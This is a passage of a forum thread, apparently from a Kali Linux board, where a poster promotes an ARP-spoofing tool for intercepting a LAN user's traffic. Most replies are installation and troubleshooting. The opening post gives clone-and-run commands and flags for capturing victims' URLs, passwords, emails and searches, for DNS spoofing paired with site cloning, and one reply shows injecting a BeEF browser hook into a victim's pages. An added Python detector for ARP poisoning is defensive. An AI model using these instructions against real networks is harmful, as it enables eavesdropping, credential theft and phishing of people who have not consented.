View Full Version : Python tool for seeing everything a LAN user is doing



flyingtriangle
2013-10-31, 21:34
This is an open source Python tool for seeing all interesting traffic from and to a client on your LAN. It's an asynchronous, multithreaded ARP spoofing packet parser. It uses the Twisted framework, iptables nfqueue to feed the callback functions packets, and scapy for most packet dissection and injection.

Simple usage:

git clone https://github.com/DanMcInerney/intercept
cd intercept/
python intercept.py -u -p -n

http://i.imgur.com/Qlo7EoI.png

http://i.imgur.com/kQofTYP.png

-u: URLs visited; truncates at 150 characters and filters image urls since they spam the output
-p: display username/passwords for FTP/IMAP/POP/IRC/HTTP, POSTs made, all searches made, and incoming/outgoing email and IRC messages sent
-n: perform and output a very quick nmap scan of the target for open ports and operating system info

Full usage:

python intercept.py -u -p -n -na -dns neopets.com -set -d -ip 10.0.1.20

http://i.imgur.com/PwzUYcY.png

-na: perform an aggressive and complete nmap scan of the victim in the background including service enumeration. Saves results to <IP address>.nmap.txt in the working directory
-dns DOMAIN: drop packets to DOMAIN and inject our own pointing the victim to the attacker's IP address. This is especially powerful when combined with SET's web site cloning tool (option 1, 2, 3, 2, then enter the domain you're spoofing).
-set: open the social engineer's toolkit

Prereqs: Linux, scapy, python nfqueue-bindings, aircrack-ng, python twisted

Tested on Kali 1.0. Please PM or reply with bug reports.
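
From the defending side, the ARP spoofing this tool relies on shows up as a change in IP-to-MAC bindings: the gateway's IP suddenly resolves to a different MAC, and that one MAC answers for several IPs. The following is an added example, not part of the original post or the intercept project; the log lines are constructed in the style of `tcpdump -n arp` output, and the gateway address 10.0.1.1 and all MAC addresses are assumed values.

```python
import re
from collections import defaultdict

# Constructed sample in the style of `tcpdump -n arp` output (not captured traffic).
SAMPLE = """\
12:00:01.10 ARP, Reply 10.0.1.1 is-at 00:11:22:33:44:55, length 28
12:00:02.40 ARP, Reply 10.0.1.20 is-at 66:77:88:99:aa:bb, length 28
12:00:05.00 ARP, Reply 10.0.1.1 is-at de:ad:be:ef:00:01, length 28
12:00:05.01 ARP, Reply 10.0.1.20 is-at de:ad:be:ef:00:01, length 28
12:00:07.00 ARP, Reply 10.0.1.1 is-at de:ad:be:ef:00:01, length 28
12:00:09.00 ARP, Request who-has 10.0.1.1 tell 10.0.1.20, length 28
"""

REPLY = re.compile(
    r"ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ((?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I)

def parse_replies(text):
    """Yield (ip, mac) for every ARP reply line; other lines are ignored."""
    for line in text.splitlines():
        m = REPLY.search(line)
        if m:
            yield m.group(1), m.group(2).lower()

def find_arp_anomalies(text, gateway_ip=None):
    """Return sorted, de-duplicated alerts as (kind, subject, detail) tuples."""
    first_seen = {}              # ip -> first MAC observed (treated as baseline)
    claimed = defaultdict(set)   # mac -> set of IPs it has answered for
    alerts = set()
    for ip, mac in parse_replies(text):
        base = first_seen.setdefault(ip, mac)
        if mac != base:
            # The binding changed after the baseline: classic poisoning symptom.
            kind = "gateway-rebind" if ip == gateway_ip else "rebind"
            alerts.add((kind, ip, f"{base} -> {mac}"))
        claimed[mac].add(ip)
    for mac, ips in claimed.items():
        if len(ips) > 1:
            # One station answering for several IPs (here: gateway and client).
            alerts.add(("mac-multi-ip", mac, ",".join(sorted(ips))))
    return sorted(alerts)

if __name__ == "__main__":
    for alert in find_arp_anomalies(SAMPLE, gateway_ip="10.0.1.1"):
        print(alert)
```

The first-seen baseline only helps if capture starts before the poisoning does, and hosts that legitimately answer for several IPs (proxy ARP, failover pairs) need an allow-list.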

axeu5
2013-11-28, 00:06
wow !!! great tool !!

zimmaro
2013-11-28, 11:26
hi :)
thanks for sharing!!!
i watch the "tutorial" posting -up

root@kali:~# git clone https://github.com/DanMcInerney/intercept
Cloning into 'intercept'...
remote: Counting objects: 306, done.
remote: Compressing objects: 100% (206/206), done.
remote: Total 306 (delta 105), reused 296 (delta 98)
Receiving objects: 100% (306/306), 83.65 KiB, done.
Resolving deltas: 100% (105/105), done.

root@kali:~# cd intercept/
root@kali:~/intercept# ls
LANs.py README.md

root@kali:~/intercept# python LANs.py
[-] python-nfqueue not installed, would you like to install now? (apt-get install -y python-nfqueue will be run if yes) [y/n]: y
Traceback (most recent call last):
File "LANs.py", line 31, in <module>
os.system('apt-get install -y python-nfqueue')
NameError: name 'os' is not defined

root@kali:~/intercept# apt-get install -y python-nfqueue
Lettura elenco dei pacchetti... Fatto
Generazione albero delle dipendenze
Lettura informazioni sullo stato... Fatto
I seguenti pacchetti saranno inoltre installati:
libnetfilter-queue1
I seguenti pacchetti NUOVI saranno installati:
libnetfilter-queue1 python-nfqueue
0 aggiornati, 2 installati, 0 da rimuovere e 7 non aggiornati.
È necessario scaricare 59,0 kB di archivi.
Dopo quest'operazione, verranno occupati 261 kB di spazio su disco.
Scaricamento di:1 http://http.kali.org/kali/ kali/main libnetfilter-queue1 i386 0.0.17-1 [7762 B]
Scaricamento di:2 http://http.kali.org/kali/ kali/main python-nfqueue i386 0.4-3 [51,2 kB]
Recuperati 59,0 kB in 1s (56,3 kB/s)
Selezionato il pacchetto libnetfilter-queue1 non precedentemente selezionato.
(Lettura del database... 329012 file e directory attualmente installati.)
Estrazione di libnetfilter-queue1 (da .../libnetfilter-queue1_0.0.17-1_i386.deb)...
Selezionato il pacchetto python-nfqueue non precedentemente selezionato.
Estrazione di python-nfqueue (da .../python-nfqueue_0.4-3_i386.deb)...
Configurazione di libnetfilter-queue1 (0.0.17-1)...
Configurazione di python-nfqueue (0.4-3)...

root@kali:~/intercept# python LANs.py
[-] Wired interface found as default route, please connect wirelessly and retry or specify the active interface with the -i [interface] option. See active interfaces with [ip addr] or [ifconfig].


One question: does it work only on a wireless iface, or can I use (partly) my active eth0 connection?

thanks in advance:)

brazen
2013-11-30, 05:09
I need to put LANs.py instead of intercept.py

dapirates
2013-11-30, 23:01
Nice script flyingtriangle. When I run it with beef using

python LANs.py -u -p -n -ip 192.168.0.6 -b http://192.168.0.9:3000/hook.js

goes fine until:

[+] Nmap done: 1 IP address (1 host up) scanned in 30.44 seconds


www.independent.co.uk/news/uk/home-news/st-andrews-day-google-doodle-marks-scotlands-national-day-with-fluttering-saltires-8974102.html
callback failure !
Traceback (most recent call last):
File "LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "LANs.py", line 239, in injecthtml
debugger = open('/home/user/projects/origBody', 'w')
IOError: [Errno 2] No such file or directory: '/home/user/projects/origBody'
callback failure !
Traceback (most recent call last):
File "LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "LANs.py", line 239, in injecthtml
debugger = open('/home/user/projects/origBody', 'w')
IOError: [Errno 2] No such file or directory: '/home/user/projects/origBody'
callback failure !
Traceback (most recent call last):
File "LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "LANs.py", line 239, in injecthtml
debugger = open('/home/user/projects/origBody', 'w')

:D

flyingtriangle
2013-12-02, 23:46
So I've done some updates. Can you please tell me if it's working now?

DareDeEvil
2013-12-04, 00:27
Came up from a new install of Kali, just about 3 hours ago and when using beef, it still gives me the same error

flyingtriangle
2013-12-09, 20:32
Whoops, that was a silly bug I uploaded. Fixed it.

f0xp
2014-01-27, 19:07
Is there a way to scan the whole network?

mmusket33
2014-01-31, 09:45
We keep getting an error when trying to install the below which is called up by the program

apt-get install -y python-nfqueue



Any help in finding this? We are using the Kali sources.list and we have tried others.

mmusket33
2014-02-02, 00:18
Further to our above, we are unable to load apt-get install -y python-nfqueue on our updated and upgraded kali1.05 hard drive installs (three computers). However, it loads on all our persistent USB installs of kali1.05.

thepoor
2014-02-11, 14:41
I had the same issue. I then modified the sources.list as below and was able to install python-nfqueue

deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib

deb http://http.kali.org/kali kali-dev main contrib non-free
deb-src http://http.kali.org/kali kali-dev main contrib non-free

deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

"This is one of Vulpi's posts on Kali"

flyinghaggis
2014-02-12, 20:19
I am getting an error
root@kali:~/intercept# python LANs.py -u -p -n
Running ARP scan to identify users on the network; this may take a minute - [nmap -sn -n 192.168.239.0/24]
[-] Router MAC not found. Exiting.

What am I doing wrong? My adapter is in mono mode and I have connected to my network via wlan0

It would appear I have found the solution to some extent - I had been running reaver prior to running this script and had killed some of the services - after a reboot the script ran, but although I am connected to my own network via a VM it does not show my computer name after the scan - all I get is three IPs, one of which is the router, with nothing else showing for the other 3 IPs. Is this normal?

Rab.